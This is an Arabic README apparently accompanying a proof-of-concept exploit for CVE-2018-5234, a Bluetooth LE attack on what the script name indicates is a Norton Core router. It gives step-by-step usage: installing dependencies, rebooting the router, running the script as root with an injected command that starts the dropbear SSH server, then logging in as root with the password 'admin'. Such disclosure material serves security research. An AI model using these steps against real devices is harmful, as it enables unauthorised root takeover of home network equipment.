
استغلال PoC لـ CVE-2018-5234
لمزيد من المعلومات اقرأ الورقة.
لتوضيح عملية الاستغلال، سنستخدم:
من أجل استخدام السكربت، ستحتاج إلى تثبيت جميع التبعيات مسبقًا:
$ pip install -r ./requirements.txt
بمساعدة أدوات BlueZ، يجب التأكد من أن البلوتوث مفعّل ويعمل
بشكل صحيح.
أعد تشغيل جهاز التوجيه للوصول إلى صفحة الهندسة.
شغّل الـ PoC بصلاحيات المستخدم الجذر (مطلوب للتعامل مع البلوتوث) مع الأمر المراد تنفيذه كوسيط:
$ ./ble_norton_core.py "/etc/init.d/dropbear start"
بعد تنفيذ السكربت بنجاح، نحصل على وصول إلى الجهاز عبر
اتصال SSH. نضع root كاسم مستخدم و admin ككلمة مرور:
$ ssh [email protected]